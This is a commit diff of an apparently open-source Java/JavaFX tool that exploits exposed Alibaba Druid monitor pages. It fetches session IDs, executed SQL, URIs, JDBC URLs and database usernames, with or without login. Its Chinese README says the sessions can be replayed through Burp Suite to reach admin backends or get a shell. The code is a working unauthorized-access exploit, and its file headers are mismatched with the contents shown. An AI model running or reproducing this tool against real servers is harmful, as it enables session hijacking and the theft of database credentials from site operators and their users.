update

Author: yuyan-sec

1.png

@@ -1,6 +1,6 @@
 ### 使用说明：
 
-利用正则匹配出session，然后就可以利用Burpsuite进行遍历sessions验证是否可用，如果你是天选之子就可以利用session进入后台或者getshell 啦。
+利用工具快速获取 Alibaba Druid 的相关参数（sessions, sql, uri, jdbc ），然后就可以利用Burpsuite进行遍历sessions验证是否可用，如果运气好就可以利用session进入后台或者getshell 啦。
 
 
 
@@ -12,14 +12,15 @@ cwkiller师傅的利用文章：https://www.cnblogs.com/cwkiller/p/12483223.html
 
 
 
-
 ### 工具说明：
 
-golang 版本可以在 [releases](https://github.com/yuyan-sec/druid_sessions/releases) 下载，使用 java 写了一个 GUI 编译好可以在 [releases](https://github.com/yuyan-sec/druid_sessions/releases) 下载
+默认请求带有 /druid/* 相关路径
 
-![](/1.png)
+![1](1.png)
 
+![1](2.png)
 
+GUI 界面参考：https://github.com/f0ng/poc2jar
 
 ----
 

2.png

@@ -4,16 +4,26 @@
          xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
     <modelVersion>4.0.0</modelVersion>
 
-    <groupId>cn.yuyan</groupId>
+    <groupId>org.example</groupId>
     <artifactId>druid_sessions</artifactId>
     <version>1.0-SNAPSHOT</version>
 
+    <properties>
+        <maven.compiler.source>8</maven.compiler.source>
+        <maven.compiler.target>8</maven.compiler.target>
+    </properties>
+
     <dependencies>
         <dependency>
-            <groupId>org.jodd</groupId>
-            <artifactId>jodd-http</artifactId>
-            <version>6.0.4</version>
-            <scope>compile</scope>
+            <groupId>com.github.kevinsawicki</groupId>
+            <artifactId>http-request</artifactId>
+            <version>6.0</version>
+        </dependency>
+
+        <dependency>
+            <groupId>com.alibaba.fastjson2</groupId>
+            <artifactId>fastjson2</artifactId>
+            <version>2.0.8</version>
         </dependency>
     </dependencies>
 

README.md

@@ -0,0 +1,3 @@
+Manifest-Version: 1.0
+Main-Class: Main
+

pom.xml

@@ -0,0 +1,133 @@
+import com.alibaba.fastjson2.JSONObject;
+import com.github.kevinsawicki.http.HttpRequest;
+import javafx.event.ActionEvent;
+import javafx.fxml.FXML;
+import javafx.scene.control.Alert;
+import javafx.scene.control.TextArea;
+import javafx.scene.control.TextField;
+
+import java.util.HashMap;
+
+public class Controller {
+
+    @FXML
+    private TextArea sessions;
+
+    @FXML
+    private TextArea urls;
+
+    @FXML
+    private TextArea sql;
+
+    @FXML
+    private TextField url;
+
+    @FXML
+    private TextField jdbc;
+
+    @FXML
+    private TextField user;
+
+    @FXML
+    private TextField pass;
+
+    private static HashMap<String, String> hashMap = new HashMap<>();
+
+    public void BtnExp(ActionEvent actionEvent) {
+        String u = url.getText();
+        u = u.replaceFirst("/$","");
+        String code = httpGet(u+"/druid/index.html","").get("code");
+        if (code.equals("302")){
+            clean();
+            ShowErr("靓仔，Druid 需要登录哦");
+            return;
+        }
+
+        Exp(u,"");
+    }
+
+    public void BtnLogin(ActionEvent actionEvent) {
+        String u = url.getText();
+        u = u.replaceFirst("/$","");
+
+        String data = String.format("loginUsername=%s&loginPassword=%s", user.getText(), pass.getText());
+        HashMap<String, String> post = httpPost(u + "/druid/submitLogin", data);
+        if (!post.get("body").equals("success")){
+            clean();
+            ShowErr("账号密码错误");
+            return;
+        }
+        Exp(u,post.get("set-cookie"));
+    }
+
+    public void Exp(String url, String cookie){
+        String webSession = url + "/druid/websession.json";
+        String webSql = url + "/druid/sql.json";
+        String webUri = url + "/druid/weburi.json";
+        String webDb = url + "/druid/datasource.json";
+
+        String s = httpGet(webSession, cookie).get("body");
+        sessions.setText(getDruidJson(s,"SESSIONID"));
+
+        String s1 = httpGet(webSql, cookie).get("body");
+        sql.setText(getDruidJson(s1,"SQL"));
+
+        String s2 = httpGet(webUri, cookie).get("body");
+        urls.setText(getDruidJson(s2,"URI"));
+
+        String s3 = httpGet(webDb, cookie).get("body");
+        String userName = getDruidJson(s3, "UserName");
+        String jdbcUrl = getDruidJson(s3, "URL");
+
+        jdbc.setText("数据库用户名: "+userName + "    " + jdbcUrl);
+    }
+
+    public static HashMap<String, String> httpGet(String url,String cookie){
+        HttpRequest httpRequest = HttpRequest.get(url).followRedirects(false).header("Cookie",cookie);
+        hashMap.put("body", httpRequest.body());
+        hashMap.put("code", String.valueOf(httpRequest.code()));
+        return hashMap;
+    }
+
+    public static HashMap<String, String> httpPost(String url, String data){
+        HttpRequest httpRequest = HttpRequest.post(url).send(data);
+        hashMap.put("body", httpRequest.body());
+        hashMap.put("code", String.valueOf(httpRequest.code()));
+        hashMap.put("set-cookie",httpRequest.header("Set-Cookie"));
+        return hashMap;
+    }
+
+    public String getDruidJson(String body, String str){
+        JSONObject object = JSONObject.parseObject(body);
+        StringBuilder result = new StringBuilder();
+
+        if(object.getJSONArray("Content") == null){
+            return "";
+        }
+
+        for (Object obj: object.getJSONArray("Content")) {
+            JSONObject jsonObject = (JSONObject) obj;
+            try {
+                String json = jsonObject.getString(str).replaceAll("\n"," ").replaceAll("\t"," ");
+                result.append(json).append("\n");
+            } catch (Exception e) {
+                e.printStackTrace();
+            }
+
+        }
+        return result.toString();
+    }
+
+    public void clean(){
+        sessions.setText("");
+        sql.setText("");
+        urls.setText("");
+        jdbc.setText("");
+    }
+    public void ShowErr(String err){
+        Alert alert = new Alert(Alert.AlertType.ERROR);
+        alert.setHeaderText(null);
+        alert.setContentText(err);
+        alert.showAndWait();
+    }
+}

src/main/META-INF/MANIFEST.MF

@@ -0,0 +1,20 @@
+import javafx.application.Application;
+import javafx.fxml.FXMLLoader;
+import javafx.scene.Parent;
+import javafx.scene.Scene;
+import javafx.stage.Stage;
+
+
+public class Main extends Application {
+    public static void main(String[] args) {
+        launch(args);
+    }
+
+    @Override
+    public void start(Stage primaryStage) throws Exception {
+        Parent root = FXMLLoader.load(getClass().getResource("main.fxml"));
+        primaryStage.setTitle("Alibaba Druid 辅助工具");
+        primaryStage.setScene(new Scene(root));
+        primaryStage.show();
+    }
+}

src/main/java/Controller.java

@@ -0,0 +1,52 @@
+<?xml version="1.0" encoding="UTF-8"?>
+
+<?import javafx.scene.control.Button?>
+<?import javafx.scene.control.Label?>
+<?import javafx.scene.control.TextArea?>
+<?import javafx.scene.control.TextField?>
+<?import javafx.scene.layout.AnchorPane?>
+<?import javafx.scene.shape.Rectangle?>
+<?import javafx.scene.text.Font?>
+
+<AnchorPane maxHeight="-Infinity" maxWidth="-Infinity" minHeight="-Infinity" minWidth="-Infinity" prefHeight="572.0" prefWidth="841.0" xmlns="http://javafx.com/javafx/8.0.202" xmlns:fx="http://javafx.com/fxml/1" fx:controller="Controller">
+   <children>
+      <Rectangle arcHeight="5.0" arcWidth="5.0" fill="WHITE" height="94.0" layoutX="3.0" layoutY="3.0" stroke="#a8a8a8" strokeType="INSIDE" width="833.0" />
+      <TextArea fx:id="sessions" layoutX="3.0" layoutY="102.0" prefHeight="461.0" prefWidth="260.0" />
+      <TextArea fx:id="urls" layoutX="265.0" layoutY="102.0" prefHeight="461.0" prefWidth="284.0" />
+      <TextArea fx:id="sql" layoutX="552.0" layoutY="102.0" prefHeight="461.0" prefWidth="284.0" />
+      <TextField fx:id="url" layoutX="66.0" layoutY="8.0" prefHeight="34.0" prefWidth="455.0" promptText="URL 默认带有路径：/druid/*" />
+      <TextField fx:id="jdbc" layoutX="66.0" layoutY="53.0" prefHeight="34.0" prefWidth="455.0" />
+      <Label layoutX="14.0" layoutY="15.0" text="URL：">
+         <font>
+            <Font size="15.0" />
+         </font>
+      </Label>
+      <Label layoutX="14.0" layoutY="60.0" text="JDBC：">
+         <font>
+            <Font size="15.0" />
+         </font>
+      </Label>
+      <Label layoutX="525.0" layoutY="15.0" text="User：">
+         <font>
+            <Font size="15.0" />
+         </font>
+      </Label>
+      <Label layoutX="525.0" layoutY="60.0" text="Pass：">
+         <font>
+            <Font size="15.0" />
+         </font>
+      </Label>
+      <TextField fx:id="user" layoutX="572.0" layoutY="8.0" prefHeight="34.0" prefWidth="155.0" />
+      <TextField fx:id="pass" layoutX="572.0" layoutY="53.0" prefHeight="34.0" prefWidth="155.0" />
+      <Button layoutX="730.0" layoutY="7.0" mnemonicParsing="false" onAction="#BtnExp" prefHeight="34.0" prefWidth="102.0" text="未授权利用">
+         <font>
+            <Font size="15.0" />
+         </font>
+      </Button>
+      <Button layoutX="730.0" layoutY="53.0" mnemonicParsing="false" onAction="#BtnLogin" prefHeight="34.0" prefWidth="102.0" text="登录后利用">
+         <font>
+            <Font size="15.0" />
+         </font>
+      </Button>
+   </children>
+</AnchorPane>